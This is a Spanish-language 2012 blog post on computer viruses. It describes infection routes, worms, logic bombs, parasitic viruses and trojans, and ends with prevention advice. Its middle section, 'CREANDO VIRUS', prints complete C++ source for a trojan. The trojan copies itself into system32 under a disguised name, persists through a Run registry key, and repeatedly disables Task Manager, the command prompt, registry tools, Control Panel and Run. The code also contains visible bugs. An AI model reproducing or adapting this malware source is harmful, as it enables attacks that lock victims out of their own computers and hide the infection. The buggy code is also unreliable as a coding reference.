lunes, 19 de noviembre de 2012

VIRUS INFOMATICOS

INTRODUCCIÓN

Dentro de un extenso mundo donde la información se maneja de forma  digital  gestionadas por diversos software implementados en la computadora, nos encontramos con software maliciosos que tiene como objetivo infiltrarse en el ordenador y realizar un sin número de actividades dañinas para nuestra información.

El proposito de este sitio es ampliar conocimientos sobre los llamados virus informaticos, con el objetivo de encontrar soluciones para algunos de ellos, se debe tener siempre en cuenta que los software maliciosos siempre estaran asechando nuestro ordenador, por lo tanto es recomendable tomar todas las precauciones posible teniendo en cuenta la optimización de nuestra pc.

Debemos saber que los virus están en constante evolución como los virus que afectan a los humanos cada vez son mas fuertes y mas invulnerables a los ataques de los antivirus y afectan a empresarios de una manera muy grande, los creadores de dicho virus son los hackers ya que ellos manipulan donde deben atacar sus programas ya que estos son solo programas que atacan el sistema.


Virus 

 Redes Sociales.
 Sitios webs fraudulentos.
 Redes P2P (descargas con regalo)
 Dispositivos USB/CDs/DVDs infectados.
 Sitios webs legítimos pero infectados.
 Adjuntos en Correos no solicitados (Spam)


Estos software o código malicioso se divide según la manera de propagación o acción que ejercen .
caballo de troya o troyano, gusano o worm, parasitos, bomba logica,  entre otros 

Se dara una peque;a rese;a sobre los virus informaticos antes mencionado


Bombas Lógicas o de Tiempo



  Programas que se activan al producirse un acontecimiento determinado. la condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o un estilo técnico Bombas Lógicas), etc... Si no se produce la condición permanece oculto al usuario

gusano

es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.Los gusanos informáticos se propagan de ordenador a ordenador, pero a diferencia de un virus, tiene la capacidad a propagarse sin la ayuda de una persona.Lo más peligroso de los worms o gusanos informáticos es su capacidad para replicarse en tu sistema, por lo que tu ordenador podría enviar cientos o miles de copias de sí mismo, creando un efecto devastador enorme

Parásitos

Tipo de virus infromatico que se adhieren a archivos (especialmente ejecutables), como lo haría un parásito. Ese archivo ejecutable es denominado portador (o host) y el virus lo utiliza para propagarse. Si el programa es ejecutado, lo primero que se ejecuta es el virus y luego, para no levantar sospechas, se ejecuta el programa original. Muchos veces es aquí donde los virus parásitos fallan, porque hay programas que detectan estas modificaciones y lanzan errores (incluso errores de advertencias de presencia de virus

TROYANOS

Teniendo en cuenta la función de algunos virus informáticos, se ampliara sobre los troyanos. ya que estos virus son muy curiosos a tratar por su forma de infectar una pc, mencionaremos algunas caracteristicas de estos, su proposito y como protegernos de ellos.





Son programas informáticos que parecen ser software útil pero que ponen en peligro la seguridad y provocan muchos daños. Un troyano reciente apareció como un mensaje de correo electrónico que incluye archivos adjuntos que aparentaban ser actualizaciones de seguridad de Microsoft, pero que resultaron ser virus que intentaban deshabilitar el software antivirus y de servidor de seguridad







 CARACTERÍSTICAS 


Conexión directa (el cliente se conecta al servidor).
žConexión inversa (el servidor se conecta al cliente).
žLa conexión inversa tiene claras ventajas sobre la conexión directa, esta traspasa algunos firewall (la mayoría de los firewall no analizan los paquetes que salen de la computadora, pero que sí analizan los que entran), pueden ser usados en redesituadas detrás de un router sin problemas (no es necesario redirigir los puertos) y no es necesario conocer la dirección  IP del servidor.

PROPÓSITO


žInstalación de otros programas (incluyendo otros
programas maliciosos).
žRobo de información personal: información bancaria,
contraseñas, códigos de seguridad.
žBorrado, modificación o transferencia de archivos
(descarga o subida).
žEjecutar o terminar procesos.
žApagar o reiniciar el equipo.
žMonitorizar las pulsaciones del teclado.
žRealizar capturas de pantalla.
žOcupar el espacio libre del disco duro con archivos inútiles.
žBorra el disco duro
Como Protegerse de lo
Protegerse de los Troyanos

žAlgunos patrones para identificarlos son: un programa desconocido se ejecuta al iniciar el
ordenador, se crean o borran archivos de forma automática, el ordenador funciona más lento de lo
normal, errores en el sistema operativo.
Por otro lado los programas antivirus están diseñados para eliminar todo tipo de software malicioso,
además de eliminarlos también previenen de nuevas infecciones actuando antes de que el sistema
resulte infectado. Es muy recomendable tener siempre un antivirus instalado en el equipo y a ser
posible también un firewall.



CREANDO VIRUS


código de virus troyano  en c++



#include <iostream.h>
#include <windows.h>
#include <stdio.h>

void moverAleatorio();
int crearkey(char *path);
void copiarvirus(char *camino);
char *getRuta();
void bloquear(char *bloqueo);

char * bloqueouno ="DisableTaskMgr"; 
char * bloqueodos ="NoControlPanel";
char * bloqueotres ="DisableRegistrytools";
char * bloqueocuatro ="DisableCMD";
char * bloqueocinco ="NoRun"; 

int main()
{
 FreeConsole(); //para que no aparezca la consola msdos
 char * senda=getRuta();//puntero que se asigna ruta que retorna un puntero
 char path[256]; 
 char pathD[256];

HMODULE nombre= GetModuleHandle(0);

GetModuleFileName(nombre,pathD,256);

strcpy(path,senda);
strcat(path,"windr32.exe");

copiarvirus(senda); //copia virus en la ruta 
 crearkey(senda); //para que el virus se este ejecutando
/*gpedit.msg para  activar simbolo del sistema*/
bloquear(bloqueouno); 
bloquear(bloqueodos);
bloquear(bloqueotres); //bloquea herramientas del sistema
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
  while(true)
  { //Mirntras no se elimine la llave el virus va a bloquear
  //herramientas del sistema
  
    crearkey(senda);

bloquear(bloqueouno);
bloquear(bloqueodos);
bloquear(bloqueotres);
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
   
//funcion moverAleatorio es para mover el puntero 
// el if verifica si el puntero esta en una posicion y mover el puntero
   if((pathD[8]==path[8])&&(pathD[20]==path[20]))
    {
    moverAleatorio();
    }
  }
 return 0;
}

//para mover el puntero sin poderlo detener

void moverAleatorio()
{
int mx,my;
//toman la medida de la pantalla 
    mx=GetSystemMetrics(SM_CXSCREEN)-1;
    my=GetSystemMetrics(SM_CYSCREEN)-1;
//mediante un num aleatorio se mueve el puntero en distintas posiciones

SetCursorPos(1+ (rand() % mx),1+ (rand() % my));
_sleep(2000);
}

// toma la ruta donde se va a alojar
char *getRuta()
{
   char *ruta=getenv("windir");
   strcat(ruta, "\\system32\\"); //concatena
   return ruta;
}

// se coloca el virus en la carpeta run 
int crearkey(char * path)
{
 int regKey ,check;
 HKEY hkey;

 regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\CurrentVersion\\Run",&hkey);
 if(regKey==0) // si existe la ruta se aloja en la ruta
 {
   RegSetValueEx((HKEY)hkey,"windr32",0,REG_SZ,(BYTE*)path,strlen(path));
   return 0;

 }
 else
     if(regKey!=0)
      return 1;
  


}

//copia el virus en la ruta 
void copiarvirus(char *camino)
{
 char path[256];
 char nombre[]="windr32";
 strcat(nombre , ".exe");
 strcat(camino,nombre);

HMODULE exe= GetModuleHandle(0); //posición actual del windr32

   GetModuleFileName(exe,path,256); //le pasa dirección actual, dond deberia de estar
   CopyFile(path,camino,false);
}

//funcion bloquear 
void bloquear(char * bloqueo)
{
  try
   {
   HKEY hMyBuffer=NULL,hMyKey=NULL;
   DWORD value=1;
   
   if(bloqueo ="DisableCMD")
    {
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   

 if( bloqueo = "DisableRegistrytools") {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS){
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   
 if(bloqueo="NoRun")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   
 if(bloqueo = "NoControlPanel")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   

 if(bloqueo = "DisableTaskMgr")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
  } 

  catch(...)
  {
            
  }
}



CONCLUSIÓN

¿Cual es el futuro de los virus?

En conclusión se tiene que los virus siempre estarán existiendo y estos serán cada vez mas difícil de detectarse y ser eliminado por un antivirus u otras herramientas de protección  por lo tanto se le recomienda desinfectar continuamente sus memorias USB, vacunar su equipo de trabajo, y analizarlo constantemente para que estos no sean victimas de un hacker.

Se recomienda no acceder a paginas web donde no se tenga la seguridad que son confiables, sobre todo no descargar programas de estas paginas ya que si los hackers son capaz de infiltrar paginas legitimas, imaginémonos como serán  las paginas en donde no hay supervición alguna de los archivos que se suben.

A las personas que tienen negocios de cyber se les recomienda desinfectar sus máquinas en un tiempo determinado y que dichas maquinas contengan herramientas para evitar que los virus logren acceder a ellas, tanto para su negocio ya que estos pueden da;ar las partes lógicas de cada pc, asi como para los usuarios de la misma.

En las empresa recomendamos hacer uso de antivirus, y denegar algunos accesos a insertar usb, tanto para evitar la infección  a los equipos como el robo de información ya que se debe mantener protegida toda información contenida en los pc.


Si se tienen celulares inteligentes es necesario descargar su antivirus para la desinfección de algunos archivos de descarga, ya que los virus del presente y el futuro ya no solo su blanco serán las computadoras y servidores, sino que se añadirá a la lista el mundo de telefonía móvil.












No hay comentarios:

Publicar un comentario